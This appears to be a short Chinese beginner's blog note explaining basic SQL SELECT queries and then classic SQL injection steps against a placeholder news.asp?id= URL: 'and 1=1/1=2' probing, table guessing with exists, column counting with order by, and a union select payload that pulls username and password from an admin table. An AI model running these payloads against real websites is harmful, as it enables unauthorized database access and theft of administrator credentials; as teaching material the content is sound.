zoukankan      html  css  js  c++  java
  • web

    SQL语句:

    select * from XXX;            #显示XXX表中的所有记录

    select * from XXX where id=1; #从XXX表中查找满足条件id=1的记录

    select usernanme,password from XXX where id=1  #从XXX表中查找满足条件id=1,并且只显示username,password字段内容

    select * from XXX where id=1 and username="admin"   #从XXX表中查找id=1且username="admin"的记录

    select * from XXX where id=1 or username="admin"    #从XXX表中查找id=1或者username

    SQL注入:

    1、判断是否有注入点:

    http://www.xxxx.com/news.asp?id=4

    select * from news where id=16

    1、查询是否存在注入点:http://www.xxxx.com/news.asp?id=4 and 1=1 如果返回页面与之前没有差别,http://www.xxxx.com/news.asp?id=4 and 1=2 返回错误页面,则表示该网站存在注入点、

    2、分析注入

    http://www.xxxx.com/news.asp?id=4 exists (select * from admin),猜表名

     http://www.xxxx.com/news.asp?id=4 order by 23 判断有多少个字段

    正常返回,说明有字段大于23;返回不正确,说明字段小于23。

    http://www.xxxx.com/news.asp?id=4 union select 1,2,3,4 from admin

    返回正常,说明有admin表名。返回的页面里面的数字,表示该对应字段里有数据,对应字段猜解字段数据http://www.xxxx.com/news.asp?id=4 union select 1,username,password,4 from admin;

    如果返回错误信息,则说明没有admin表

  • 相关阅读:
    js 遇到问题
    table 排序 添加 删除 等操作
    json对象
    .style, .getComputedStyle(),.currentStyle区别
    3个div 宽度移入移出时变化
    运动 js
    OWASP Top 10之文件上传漏洞简析(二)
    owasp top10 之文件上传漏洞简析
    前台实现ajax 需注意的地方
    apache-Rewrite重写规则配置
  • 原文地址:https://www.cnblogs.com/liuyp/p/8024002.html
Copyright © 2011-2022 走看看